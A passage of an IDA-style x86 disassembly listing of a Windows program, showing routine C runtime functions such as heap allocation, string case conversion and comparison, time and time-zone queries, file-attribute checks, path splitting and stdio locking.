xor ebx, ebx
mov esi, [ebp+0Ch]
sub_423FF7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423FFC proc near ; CODE XREF: sub_423F63+85�p
push 9
call sub_428497
pop ecx
retn
sub_423FFC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F63
loc_424005: ; CODE XREF: sub_423F63+5F�j
cmp eax, 2
jnz short loc_42404B
cmp esi, dword_44BA9C
ja short loc_42404B
push 9
call sub_428436
pop ecx
mov [ebp+var_4], 1
mov eax, esi
shr eax, 4
push eax
call sub_428038
pop ecx
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_424085
cmp [ebp+var_20], ebx
jz short loc_424050
push esi
loc_42403F: ; CODE XREF: sub_423F63+92�j
push ebx
push [ebp+var_20]
call sub_4221F0
add esp, 0Ch
loc_42404B: ; CODE XREF: sub_423F63+6A�j
; sub_423F63+A5�j ...
cmp [ebp+var_20], ebx
jnz short loc_42408E
loc_424050: ; CODE XREF: sub_423F63+8D�j
; sub_423F63+D9�j
push esi
push 8
push dword_6319BC
call dword_42F1EC ; RtlAllocateHeap
mov [ebp+var_20], eax
loc_424062: ; CODE XREF: sub_423F63+51�j
cmp [ebp+var_20], ebx
jnz short loc_42408E
cmp dword_6313F8, ebx
jz short loc_42408E
push esi
call sub_42700C
pop ecx
test eax, eax
jnz loc_423FAE
jmp short loc_424091
; END OF FUNCTION CHUNK FOR sub_423F63
; ---------------------------------------------------------------------------
xor ebx, ebx
mov esi, [ebp+0Ch]
; =============== S U B R O U T I N E =======================================
sub_424085 proc near ; CODE XREF: sub_423F63+D1�p
push 9
call sub_428497
pop ecx
retn
sub_424085 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F63
loc_42408E: ; CODE XREF: sub_423F63+EB�j
; sub_423F63+102�j ...
mov eax, [ebp+var_20]
loc_424091: ; CODE XREF: sub_423F63+11B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_423F63
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4240A0 proc near ; CODE XREF: sub_4105DF+3B�p
; sub_4105DF+45�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
xor esi, esi
cmp dword_6314C8, esi
push edi
mov [ebp+var_8], esi
jnz short loc_4240DE
mov eax, [ebp+arg_0]
mov edx, eax
cmp byte ptr [eax], 0
jz loc_4241D0
loc_4240C2: ; CODE XREF: sub_4240A0+37�j
mov cl, [edx]
cmp cl, 41h
jl short loc_4240D3
cmp cl, 5Ah
jg short loc_4240D3
add cl, 20h
mov [edx], cl
loc_4240D3: ; CODE XREF: sub_4240A0+27�j
; sub_4240A0+2C�j
inc edx
cmp byte ptr [edx], 0
jnz short loc_4240C2
jmp loc_4241D0
; ---------------------------------------------------------------------------
loc_4240DE: ; CODE XREF: sub_4240A0+12�j
mov edi, offset dword_63198C
push edi
call dword_42F200 ; InterlockedIncrement
cmp dword_631988, esi
jz short loc_42410A
push edi
call dword_42F1FC ; InterlockedDecrement
push 13h
call sub_428436
pop ecx
mov [ebp+var_4], 1
jmp short loc_42410D
; ---------------------------------------------------------------------------
loc_42410A: ; CODE XREF: sub_4240A0+50�j
mov [ebp+var_4], esi
loc_42410D: ; CODE XREF: sub_4240A0+68�j
mov eax, dword_6314C8
cmp eax, esi
jnz short loc_424153
cmp [ebp+var_4], esi
jz short loc_424125
push 13h
call sub_428497
pop ecx
jmp short loc_42412C
; ---------------------------------------------------------------------------
loc_424125: ; CODE XREF: sub_4240A0+79�j
push edi
call dword_42F1FC ; InterlockedDecrement
loc_42412C: ; CODE XREF: sub_4240A0+83�j
mov eax, [ebp+arg_0]
mov edx, eax
cmp byte ptr [eax], 0
jz loc_4241D0
loc_42413A: ; CODE XREF: sub_4240A0+AF�j
mov cl, [edx]
cmp cl, 41h
jl short loc_42414B
cmp cl, 5Ah
jg short loc_42414B
add cl, 20h
mov [edx], cl
loc_42414B: ; CODE XREF: sub_4240A0+9F�j
; sub_4240A0+A4�j
inc edx
cmp byte ptr [edx], 0
jnz short loc_42413A
jmp short loc_4241D0
; ---------------------------------------------------------------------------
loc_424153: ; CODE XREF: sub_4240A0+74�j
push ebx
push 1
push esi
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_0]
mov esi, 100h
push esi
push eax
call sub_429BA7
mov ebx, eax
add esp, 20h
test ebx, ebx
jz short loc_4241AC
push ebx
call sub_422F79
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_4241AC
push 1
push 0
push ebx
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push dword_6314C8
call sub_429BA7
add esp, 20h
test eax, eax
jz short loc_4241AC
push [ebp+var_8]
push [ebp+arg_0]
call sub_423260
pop ecx
pop ecx
loc_4241AC: ; CODE XREF: sub_4240A0+D1�j
; sub_4240A0+DF�j ...
cmp [ebp+var_4], 0
pop ebx
jz short loc_4241BD
push 13h
call sub_428497
pop ecx
jmp short loc_4241C4
; ---------------------------------------------------------------------------
loc_4241BD: ; CODE XREF: sub_4240A0+111�j
push edi
call dword_42F1FC ; InterlockedDecrement
loc_4241C4: ; CODE XREF: sub_4240A0+11B�j
push [ebp+var_8]
call sub_4230B3
mov eax, [ebp+arg_0]
pop ecx
loc_4241D0: ; CODE XREF: sub_4240A0+1C�j
; sub_4240A0+39�j ...
pop edi
pop esi
leave
retn
sub_4240A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4241D4 proc near ; CODE XREF: sub_41112E+35�p
; sub_41112E+122�p ...
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_42F20C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call dword_42F208 ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word_6313E2
jnz short loc_424239
mov ax, [ebp+var_18]
cmp ax, word_6313E0
jnz short loc_424239
mov ax, [ebp+var_1A]
cmp ax, word_6313DE
jnz short loc_424239
mov ax, [ebp+var_1E]
cmp ax, word_6313DA
jnz short loc_424239
mov ax, [ebp+var_20]
cmp ax, word_6313D8
jnz short loc_424239
mov eax, dword_6313D0
jmp short loc_42427E
; ---------------------------------------------------------------------------
loc_424239: ; CODE XREF: sub_4241D4+28�j
; sub_4241D4+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_42F204 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_424266
cmp eax, 2
jnz short loc_424262
cmp [ebp+var_32], 0
jz short loc_424262
cmp [ebp+var_24], 0
jz short loc_424262
push 1
pop eax
jmp short loc_424269
; ---------------------------------------------------------------------------
loc_424262: ; CODE XREF: sub_4241D4+7A�j
; sub_4241D4+81�j ...
xor eax, eax
jmp short loc_424269
; ---------------------------------------------------------------------------
loc_424266: ; CODE XREF: sub_4241D4+75�j
or eax, 0FFFFFFFFh
loc_424269: ; CODE XREF: sub_4241D4+8C�j
; sub_4241D4+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_6313D8
movsd
movsd
movsd
movsd
pop edi
mov dword_6313D0, eax
pop esi
loc_42427E: ; CODE XREF: sub_4241D4+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_429DCB
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_4242AE
mov [ecx], eax
locret_4242AE: ; CODE XREF: sub_4241D4+D6�j
leave
retn
sub_4241D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4242B0(double)
sub_4242B0 proc near ; CODE XREF: sub_4128D4+3C6�p
; sub_41391C+58B�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_449420
call sub_42A6B8
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_424336
call sub_42A580
pop ecx
test eax, eax
pop ecx
jle short loc_424319
cmp eax, 2
jle short loc_42430B
cmp eax, 3
jnz short loc_424319
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_429E8D
add esp, 10h
jmp short loc_42437B
; ---------------------------------------------------------------------------
loc_42430B: ; CODE XREF: sub_4242B0+3F�j
push esi
push ebx
call sub_42A6B8
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_42437B
; ---------------------------------------------------------------------------
loc_424319: ; CODE XREF: sub_4242B0+3A�j
; sub_4242B0+44�j
fld [ebp+arg_0]
fadd dbl_42F450
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_424373
; ---------------------------------------------------------------------------
loc_424336: ; CODE XREF: sub_4242B0+2F�j
call sub_42A545
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_424359
loc_42434B: ; CODE XREF: sub_4242B0+AC�j
push esi
push ebx
call sub_42A6B8
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_42437B
; ---------------------------------------------------------------------------
loc_424359: ; CODE XREF: sub_4242B0+99�j
test bl, 20h
jnz short loc_42434B
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_424373: ; CODE XREF: sub_4242B0+84�j
call sub_429EE1
add esp, 1Ch
loc_42437B: ; CODE XREF: sub_4242B0+59�j
; sub_4242B0+67�j ...
pop esi
pop ebx
leave
retn
sub_4242B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424380 proc near ; CODE XREF: sub_40D695+7�p
; sub_4128D4+19�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_6314C0
cmp dword ptr [eax+8], 0
jnz short loc_4243D3
mov al, 0FFh
mov edi, edi
loc_42439C: ; CODE XREF: sub_424380+28�j
; sub_424380+48�j
or al, al
jz short loc_4243CE
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_42439C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_42439C
sbb al, al
sbb al, 0FFh
loc_4243CE: ; CODE XREF: sub_424380+1E�j
movsx eax, al
jmp short loc_42444B
; ---------------------------------------------------------------------------
loc_4243D3: ; CODE XREF: sub_424380+16�j
lock inc dword_63198C
cmp dword_631988, 0
jg short loc_4243E7
push 0
jmp short loc_4243FC
; ---------------------------------------------------------------------------
loc_4243E7: ; CODE XREF: sub_424380+61�j
lock dec dword_63198C
push 13h
call sub_428436
mov [esp+10h+var_10], 1
loc_4243FC: ; CODE XREF: sub_424380+65�j
mov eax, 0FFh
xor ebx, ebx
nop
loc_424404: ; CODE XREF: sub_424380+90�j
; sub_424380+A8�j
or al, al
jz short loc_42442F
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_424404
push eax
push ebx
call sub_42A7A0
mov ebx, eax
add esp, 4
call sub_42A7A0
add esp, 4
cmp bl, al
jz short loc_424404
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_42442F: ; CODE XREF: sub_424380+86�j
mov ebx, eax
pop eax
or eax, eax
jnz short loc_42443F
lock dec dword_63198C
jmp short loc_424449
; ---------------------------------------------------------------------------
loc_42443F: ; CODE XREF: sub_424380+B4�j
push 13h
call sub_428497
add esp, 4
loc_424449: ; CODE XREF: sub_424380+BD�j
mov eax, ebx
loc_42444B: ; CODE XREF: sub_424380+51�j
pop ebx
pop esi
pop edi
leave
retn
sub_424380 endp
; =============== S U B R O U T I N E =======================================
sub_424450 proc near ; CODE XREF: sub_4130E5+30C�p
; sub_423517+29�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_42F0A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_424470
call dword_42F068 ; RtlGetLastWin32Error
push eax
call sub_4264B5
pop ecx
loc_42446C: ; CODE XREF: sub_424450+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_424470: ; CODE XREF: sub_424450+D�j
test al, 1
jz short loc_424493
test [esp+arg_4], 2
jz short loc_424493
call sub_426528
mov dword ptr [eax], 0Dh
call sub_426531
mov dword ptr [eax], 5
jmp short loc_42446C
; ---------------------------------------------------------------------------
loc_424493: ; CODE XREF: sub_424450+22�j
; sub_424450+29�j
xor eax, eax
retn
sub_424450 endp
; =============== S U B R O U T I N E =======================================
sub_424496 proc near ; CODE XREF: sub_414926+14�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push ebx
push esi
mov esi, offset dword_449450
push edi
push esi
push 1
call sub_42486B
push esi
call sub_42A86B
mov edi, eax
lea eax, [esp+18h+arg_4]
push eax
push [esp+1Ch+arg_0]
push esi
call sub_42512C
push esi
push edi
mov ebx, eax
call sub_42A8F8
push esi
push 1
call sub_4248BD
add esp, 28h
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_424496 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4244E0 proc near ; CODE XREF: sub_415126+65�p
; sub_415126+9C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_424501
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_424501: ; CODE XREF: sub_4244E0+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_42451D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_42451D: ; CODE XREF: sub_4244E0+27�j
or eax, eax
jnz short loc_424539
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_42457A
; ---------------------------------------------------------------------------
loc_424539: ; CODE XREF: sub_4244E0+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_424547: ; CODE XREF: sub_4244E0+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_424547
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_424575
cmp edx, [esp+0Ch+arg_4]
ja short loc_424575
jb short loc_424576
cmp eax, [esp+0Ch+arg_0]
jbe short loc_424576
loc_424575: ; CODE XREF: sub_4244E0+85�j
; sub_4244E0+8B�j
dec esi
loc_424576: ; CODE XREF: sub_4244E0+8D�j
; sub_4244E0+93�j
xor edx, edx
mov eax, esi
loc_42457A: ; CODE XREF: sub_4244E0+57�j
dec edi
jnz short loc_424584
neg edx
neg eax
sbb edx, 0
loc_424584: ; CODE XREF: sub_4244E0+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_4244E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42458A proc near ; CODE XREF: sub_416C0B+130�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_42459E
xor eax, eax
jmp short loc_4245E8
; ---------------------------------------------------------------------------
loc_42459E: ; CODE XREF: sub_42458A+E�j
push esi
mov esi, [ebp+arg_8]
push esi
call sub_42483C
pop ecx
loc_4245A9: ; CODE XREF: sub_42458A+46�j
dec [ebp+arg_4]
jz short loc_4245DB
dec dword ptr [esi+4]
js short loc_4245BD
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_4245C4
; ---------------------------------------------------------------------------
loc_4245BD: ; CODE XREF: sub_42458A+27�j
push esi
call sub_426826
pop ecx
loc_4245C4: ; CODE XREF: sub_42458A+31�j
cmp eax, 0FFFFFFFFh
jz short loc_4245D2
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_4245DB
jmp short loc_4245A9
; ---------------------------------------------------------------------------
loc_4245D2: ; CODE XREF: sub_42458A+3D�j
cmp edi, [ebp+arg_0]
jnz short loc_4245DB
xor ebx, ebx
jmp short loc_4245DE
; ---------------------------------------------------------------------------
loc_4245DB: ; CODE XREF: sub_42458A+22�j
; sub_42458A+44�j ...
and byte ptr [edi], 0
loc_4245DE: ; CODE XREF: sub_42458A+4F�j
push esi
call sub_42488E
pop ecx
mov eax, ebx
pop esi
loc_4245E8: ; CODE XREF: sub_42458A+12�j
pop edi
pop ebx
pop ebp
retn
sub_42458A endp
; =============== S U B R O U T I N E =======================================
sub_4245EC proc near ; CODE XREF: sub_4245F8�j
push offset off_449430
call sub_42A953
pop ecx
retn
sub_4245EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4245F8 proc near ; CODE XREF: sub_417A90+231�p
jmp sub_4245EC
sub_4245F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4245FD proc near ; CODE XREF: sub_418010+327�p
; sub_418436+14F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_422120
cmp eax, 1
pop ecx
jb short loc_424638
cmp byte ptr [ebx+1], 3Ah
jnz short loc_424638
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_424634
push 2
push ebx
push esi
call sub_42AD52
add esp, 0Ch
and byte ptr [esi+2], 0
loc_424634: ; CODE XREF: sub_4245FD+25�j
inc ebx
inc ebx
jmp short loc_424642
; ---------------------------------------------------------------------------
loc_424638: ; CODE XREF: sub_4245FD+18�j
; sub_4245FD+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_424642
and byte ptr [eax], 0
loc_424642: ; CODE XREF: sub_4245FD+39�j
; sub_4245FD+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_4246BA
loc_424655: ; CODE XREF: sub_4245FD+87�j
mov cl, [eax]
movzx edx, cl
test byte_631881[edx], 4
jz short loc_424666
inc eax
jmp short loc_424680
; ---------------------------------------------------------------------------
loc_424666: ; CODE XREF: sub_4245FD+64�j
cmp cl, 2Fh
jz short loc_42467A
cmp cl, 5Ch
jz short loc_42467A
cmp cl, 2Eh
jnz short loc_424680
mov [ebp+var_4], eax
jmp short loc_424680
; ---------------------------------------------------------------------------
loc_42467A: ; CODE XREF: sub_4245FD+6C�j
; sub_4245FD+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_424680: ; CODE XREF: sub_4245FD+67�j
; sub_4245FD+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_424655
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_4246BA
cmp [ebp+arg_8], 0
jz short loc_4246B5
sub edi, ebx
cmp edi, esi
jb short loc_42469E
mov edi, esi
loc_42469E: ; CODE XREF: sub_4245FD+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_42AD52
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4246B5: ; CODE XREF: sub_4245FD+97�j
mov ebx, [ebp+arg_4]
jmp short loc_4246C4
; ---------------------------------------------------------------------------
loc_4246BA: ; CODE XREF: sub_4245FD+56�j
; sub_4245FD+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_4246C4
and byte ptr [ecx], 0
loc_4246C4: ; CODE XREF: sub_4245FD+BB�j
; sub_4245FD+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_424717
cmp edi, ebx
jb short loc_424717
cmp [ebp+arg_C], 0
jz short loc_4246F4
sub edi, ebx
cmp edi, esi
jb short loc_4246DD
mov edi, esi
loc_4246DD: ; CODE XREF: sub_4245FD+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_42AD52
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4246F4: ; CODE XREF: sub_4245FD+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_42473F
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_424704
mov esi, eax
loc_424704: ; CODE XREF: sub_4245FD+103�j
push esi
push [ebp+var_4]
push edi
call sub_42AD52
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_42473F
; ---------------------------------------------------------------------------
loc_424717: ; CODE XREF: sub_4245FD+CC�j
; sub_4245FD+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_424735
sub eax, ebx
cmp eax, esi
jnb short loc_424726
mov esi, eax
loc_424726: ; CODE XREF: sub_4245FD+125�j
push esi
push ebx
push edi
call sub_42AD52
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_424735: ; CODE XREF: sub_4245FD+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_42473F
and byte ptr [eax], 0
loc_42473F: ; CODE XREF: sub_4245FD+FC�j
; sub_4245FD+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4245FD endp
; =============== S U B R O U T I N E =======================================
sub_424744 proc near ; CODE XREF: sub_418436+17B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push esi
call sub_42483C
push esi
call sub_42A86B
mov edi, eax
lea eax, [esp+14h+arg_8]
push eax
push [esp+18h+arg_4]
push esi
call sub_42512C
push esi
push edi
mov ebx, eax
call sub_42A8F8
push esi
call sub_42488E
add esp, 20h
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_424744 endp
; =============== S U B R O U T I N E =======================================
sub_424780 proc near ; DATA XREF: .text:00432024�o
mov eax, dword_632B00
push esi
push 14h
test eax, eax
pop esi
jnz short loc_424794
mov eax, 200h
jmp short loc_42479A
; ---------------------------------------------------------------------------
loc_424794: ; CODE XREF: sub_424780+B�j
cmp eax, esi
jge short loc_42479F
mov eax, esi
loc_42479A: ; CODE XREF: sub_424780+12�j
mov dword_632B00, eax
loc_42479F: ; CODE XREF: sub_424780+16�j
push 4
push eax
call sub_423F63
pop ecx
mov dword_631AE8, eax
test eax, eax
pop ecx
jnz short loc_4247D3
push 4
push esi
mov dword_632B00, esi
call sub_423F63
pop ecx
mov dword_631AE8, eax
test eax, eax
pop ecx
jnz short loc_4247D3
push 1Ah
call sub_424FCB
pop ecx
loc_4247D3: ; CODE XREF: sub_424780+30�j
; sub_424780+49�j
xor ecx, ecx
mov eax, offset off_449430
loc_4247DA: ; CODE XREF: sub_424780+6E�j
mov edx, dword_631AE8
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset off_4496B0
jl short loc_4247DA
xor ecx, ecx
mov edx, offset dword_449440
loc_4247F7: ; CODE XREF: sub_424780+A4�j
mov esi, ecx
mov eax, ecx
sar esi, 5
and eax, 1Fh
mov esi, dword_6319E0[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_424817
test eax, eax
jnz short loc_42481A
loc_424817: ; CODE XREF: sub_424780+91�j
or dword ptr [edx], 0FFFFFFFFh
loc_42481A: ; CODE XREF: sub_424780+95�j
add edx, 20h
inc ecx
cmp edx, offset dword_4494A0
jl short loc_4247F7
pop esi
retn
sub_424780 endp
; =============== S U B R O U T I N E =======================================
sub_424828 proc near ; DATA XREF: .text:00432038�o
call sub_426779
cmp byte_6314A0, 0
jz short locret_42483B
jmp sub_42ADEC
; ---------------------------------------------------------------------------
locret_42483B: ; CODE XREF: sub_424828+C�j
retn
sub_424828 endp
; =============== S U B R O U T I N E =======================================
sub_42483C proc near ; CODE XREF: sub_422B65+16�p
; sub_422BE2+7�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_449430
cmp eax, ecx
jb short loc_424860
cmp eax, offset dword_449690
ja short loc_424860
sub eax, ecx
sar eax, 5
add eax, 1Ch
push eax
call sub_428436
pop ecx
retn
; ---------------------------------------------------------------------------
loc_424860: ; CODE XREF: sub_42483C+B�j
; sub_42483C+12�j
add eax, 20h
push eax
call dword_42F140 ; RtlEnterCriticalSection
retn
sub_42483C endp
; =============== S U B R O U T I N E =======================================
sub_42486B proc near ; CODE XREF: sub_424496+B�p
; sub_426782+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_42487F
add eax, 1Ch
push eax
call sub_428436
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42487F: ; CODE XREF: sub_42486B+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_42F140 ; RtlEnterCriticalSection
retn
sub_42486B endp
; =============== S U B R O U T I N E =======================================
sub_42488E proc near ; CODE XREF: sub_422B65+24�p
; sub_422BE2+22�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_449430
cmp eax, ecx
jb short loc_4248B2
cmp eax, offset dword_449690
ja short loc_4248B2
sub eax, ecx
sar eax, 5
add eax, 1Ch
push eax
call sub_428497
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4248B2: ; CODE XREF: sub_42488E+B�j
; sub_42488E+12�j
add eax, 20h
push eax
call dword_42F144 ; RtlLeaveCriticalSection
retn
sub_42488E endp
; =============== S U B R O U T I N E =======================================
sub_4248BD proc near ; CODE XREF: sub_424496+33�p
; sub_426782+7D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4248D1
add eax, 1Ch
push eax
call sub_428497
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4248D1: ; CODE XREF: sub_4248BD+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_42F144 ; RtlLeaveCriticalSection
retn
sub_4248BD endp
; =============== S U B R O U T I N E =======================================
sub_4248E0 proc near ; CODE XREF: sub_418614+15D�p
; sub_4228B3+12B�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
cmp dword_6314C8, ebx
jnz short loc_4248FE
mov eax, [esp+4+arg_0]
cmp eax, 61h
jl short loc_42494D
cmp eax, 7Ah
jg short loc_42494D
sub eax, 20h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4248FE: ; CODE XREF: sub_4248E0+9�j
push esi
mov esi, offset dword_63198C
push edi
push esi
call dword_42F200 ; InterlockedIncrement
cmp dword_631988, ebx
mov edi, dword_42F1FC
jz short loc_424928
push esi
call edi ; dword_42F1FC
push 13h
call sub_428436
pop ecx
push 1
pop ebx
loc_424928: ; CODE XREF: sub_4248E0+38�j
push [esp+0Ch+arg_0]
call sub_42494F
test ebx, ebx
pop ecx
mov [esp+0Ch+arg_0], eax
jz short loc_424944
push 13h
call sub_428497
pop ecx
jmp short loc_424947
; ---------------------------------------------------------------------------
loc_424944: ; CODE XREF: sub_4248E0+58�j
push esi
call edi ; dword_42F1FC
loc_424947: ; CODE XREF: sub_4248E0+62�j
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
loc_42494D: ; CODE XREF: sub_4248E0+12�j
; sub_4248E0+17�j
pop ebx
retn
sub_4248E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42494F proc near ; CODE XREF: sub_4248E0+4C�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_6314C8, 0
push ebx
jnz short loc_42497A
